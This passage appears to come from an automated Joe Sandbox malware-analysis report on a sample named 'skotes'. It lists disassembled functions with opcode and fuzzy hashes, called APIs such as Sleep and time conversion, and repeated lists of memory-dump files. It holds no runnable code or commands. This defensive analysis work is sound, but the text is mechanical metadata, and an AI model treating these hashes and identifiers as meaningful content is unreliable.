                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00def815d9c199bc7bcdd020a7c593b15fa9d9d0c33108a2c15b96376ea7c5ed
                                                          • Instruction ID: 0e3db9084cdeb5b83a85b062cc8b742dafb6584dc126aeb66251b8c5bb2c1914
                                                          • Opcode Fuzzy Hash: 00def815d9c199bc7bcdd020a7c593b15fa9d9d0c33108a2c15b96376ea7c5ed
                                                          • Instruction Fuzzy Hash: A021D672905208ABEB11ABA89C46BEF7729DF43374F200355F9342B1C1DB709E46B6A1
                                                          APIs
                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00C1705B,?,?,00000000,00000000), ref: 00C17166
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$LocalSpecificSystem
                                                          • String ID:
                                                          • API String ID: 2574697306-0
                                                          • Opcode ID: db21d8dc8ee8b5ed84d4deeb07005a73d648c6eeccaa3524a2d26bf440ce25fb
                                                          • Instruction ID: a58922748d64117f701444b0146fcb99b457ad89bafddfd54c94df9fd5499003
                                                          • Opcode Fuzzy Hash: db21d8dc8ee8b5ed84d4deeb07005a73d648c6eeccaa3524a2d26bf440ce25fb
                                                          • Instruction Fuzzy Hash: CF11067290410CBADF10DED5C985ADFB7BCAF09310F605262E526E2180EB30EB89DB61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 25657b72e2253ac96bf9016fc9df94ec14b90dcf97158f19a9f2a5063334cc5d
                                                          • Instruction ID: 7fd91719605f5e6ec137389526113ae67bfa63ce0349e9e81a9ce15c3309f4c2
                                                          • Opcode Fuzzy Hash: 25657b72e2253ac96bf9016fc9df94ec14b90dcf97158f19a9f2a5063334cc5d
                                                          • Instruction Fuzzy Hash: EFF0D171A40654ABC710BB689D03B2EBBB4EB06B60F900298F821673D1DB701A0447D2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c028743f0f9c2cadce50e81a33887bb412ced830624a324cf29c2d760c877dca
                                                          • Instruction ID: b454369218f098ab06bdaf67443d885010bd1774c4480aa41c566632058c7004
                                                          • Opcode Fuzzy Hash: c028743f0f9c2cadce50e81a33887bb412ced830624a324cf29c2d760c877dca
                                                          • Instruction Fuzzy Hash: ED2138AF17C014FD6143C091266CAF63BAFEDD76313B04467F807DAA02D2D51A5B4272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e6083f2074e784a1567295c008a68fb738bd20f2fb43aa2545d3815584b6401
                                                          • Instruction ID: 793ccae5d0843cc9d08a6d906ea8906f909c68f4af5b80c62f90820b5f3e0162
                                                          • Opcode Fuzzy Hash: 1e6083f2074e784a1567295c008a68fb738bd20f2fb43aa2545d3815584b6401
                                                          • Instruction Fuzzy Hash: 651196EF07C110BD6142C0852B6CAF77A6FE9DA7303B08436F80BD6602D2D51A5B5172
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcc59059f6494ef48d78ac66f7a8b9738361a742f62dae18228b3c901ce6c758
                                                          • Instruction ID: b8f899d391bf2819867e92a1dc62571bd466c6a9a2adb994bfe78aba9225960a
                                                          • Opcode Fuzzy Hash: bcc59059f6494ef48d78ac66f7a8b9738361a742f62dae18228b3c901ce6c758
                                                          • Instruction Fuzzy Hash: 7B21B4EF07C211BDA142C5952A2CAF77A6FE9D77303B08437F807D6502D2D55A1B5272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dcd4285ae007204bc4fea911c408044fef925c061d4c1294b1cb5f3f6da2700b
                                                          • Instruction ID: 9eb77e6420e274d4f31d1063210d0f025490b0f9b7aeb1ae53751f42f0c16ef6
                                                          • Opcode Fuzzy Hash: dcd4285ae007204bc4fea911c408044fef925c061d4c1294b1cb5f3f6da2700b
                                                          • Instruction Fuzzy Hash: 2B1182EF1BC110BD6142D0852B28AF77A6FE9D77303B08436F80BD6602D2D51B5A5272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d94b815cdbd2eecdd7eda6dd184203cbebd548284ba673ffc9b6f7ac204ebab
                                                          • Instruction ID: da8c615de0a34a91813193ff949eacad964fd4576889f45d43b013613d667918
                                                          • Opcode Fuzzy Hash: 5d94b815cdbd2eecdd7eda6dd184203cbebd548284ba673ffc9b6f7ac204ebab
                                                          • Instruction Fuzzy Hash: 971186EF1BC110BD6142D4952A28EFB7A6FE9DA7303B0C437F807C6506D2D45A1A5272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccd51672a7ea1a997a63edefec738280bdfd0ceeebc4be6da9cf273a45c1fec5
                                                          • Instruction ID: 4c72becb427983bd649dd40a5c08e784aed5ac7e9f4f33d7624ec1b7c6720f40
                                                          • Opcode Fuzzy Hash: ccd51672a7ea1a997a63edefec738280bdfd0ceeebc4be6da9cf273a45c1fec5
                                                          • Instruction Fuzzy Hash: 4911C2EF0BC010BD6142C0912A68AFB3B6FE9D67303B48437F807C6906D2D91B5B5272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2f015ade7aa9e8af17a62be3ab567dd6d1444df732df762f6c49e7d9347a4c5
                                                          • Instruction ID: 39aa6fcd161576dcf3adbef8161876ec3efa92deb238fdebbf3d0bb9579da65c
                                                          • Opcode Fuzzy Hash: b2f015ade7aa9e8af17a62be3ab567dd6d1444df732df762f6c49e7d9347a4c5
                                                          • Instruction Fuzzy Hash: D2116BBF07C010BDA202D4651A699F73B6FEED73303B4843BF407C6906D2D51A1A5232
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21b5c24d4bbec2837f591bf55deff36723a8295a95cdc6aa0cd514043cf9bbba
                                                          • Instruction ID: 78a11b7c133440039d1a5458c0427ca6109de5d0f206b389c257e25a9aeab3ab
                                                          • Opcode Fuzzy Hash: 21b5c24d4bbec2837f591bf55deff36723a8295a95cdc6aa0cd514043cf9bbba
                                                          • Instruction Fuzzy Hash: 75F0A4EF0BC010BD6142C0962A69AF73A6FE9DB7303B48437F40BC5A05C2D51A5A5272
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44572922ac0a8fdf188a05be124132e32e42ac945d53017fd19fedde3a7ef423
                                                          • Instruction ID: c73ad6a170f1690520c5b541d7f2fbab4b1bc7168de8bc14af73f08d99f4e126
                                                          • Opcode Fuzzy Hash: 44572922ac0a8fdf188a05be124132e32e42ac945d53017fd19fedde3a7ef423
                                                          • Instruction Fuzzy Hash: 1EF02E960BC1509EC647F96055692F37FAB6F1B33137814B7D1D7C6542D4E0024AC6A2
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0aaf8baeb34c4b0253b19854fb5e7f73fc8827f0b9f9e0907ffac869ef48a973
                                                          • Instruction ID: df2d530740540cba4aa98226a4b00604389de6ec94cc507827cfcbfce95adf8d
                                                          • Opcode Fuzzy Hash: 0aaf8baeb34c4b0253b19854fb5e7f73fc8827f0b9f9e0907ffac869ef48a973
                                                          • Instruction Fuzzy Hash: 4AF027AB0BC010AD5242E0F5125E3B6795FED2F2303B84437A547D6A05C5C41A264167
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5452a71804a5a71a7cf191dbe664d8ada5dd5f9176c0dbb5bccd1d7adeea658
                                                          • Instruction ID: d5c58346be77482b5e8e00fdc54eda60ac544c59ec1427978d2bd4334e33a341
                                                          • Opcode Fuzzy Hash: c5452a71804a5a71a7cf191dbe664d8ada5dd5f9176c0dbb5bccd1d7adeea658
                                                          • Instruction Fuzzy Hash: 68F05CBA0BC000EE5142D09666196B7765FFE6B3303B4407BF457C7A01C5E416228173
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 760408b1b19c48f52afd1a0e0b7c5b844d75cbfeac0e73c9c73c7de401aba3db
                                                          • Instruction ID: 76f4f7e3d909b210ee1bd8bc015db03a82912eef7e61865fb14d51e2b041c3e9
                                                          • Opcode Fuzzy Hash: 760408b1b19c48f52afd1a0e0b7c5b844d75cbfeac0e73c9c73c7de401aba3db
                                                          • Instruction Fuzzy Hash: BDF055A707C0408DE242D0E1122E3B67A8BAF2B330BB8447BE087C7A02C1E842568263
                                                          APIs
                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00F16
                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00F62
                                                            • Part of subcall function 00C0265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00C02750
                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00C00FCE
                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00FEA
                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C0103E
                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C0106B
                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00C010C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                          • String ID: (
                                                          • API String ID: 2943730970-3887548279
                                                          • Opcode ID: e9df6a4fe2aba0da6f0338d49e4dffa39289402407db6a32fc2f29874cd75e75
                                                          • Instruction ID: 46a43c97d5df9719b4e69ec1d3bd647a0744f97dd417fce81daf70dcf1c39b96
                                                          • Opcode Fuzzy Hash: e9df6a4fe2aba0da6f0338d49e4dffa39289402407db6a32fc2f29874cd75e75
                                                          • Instruction Fuzzy Hash: 4FB18EB4A00616EFDB28CF58D980B7DB7B4FF49304F25416EE955AB281D730AE81CB90
                                                          APIs
                                                            • Part of subcall function 00C02CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00C02D0F
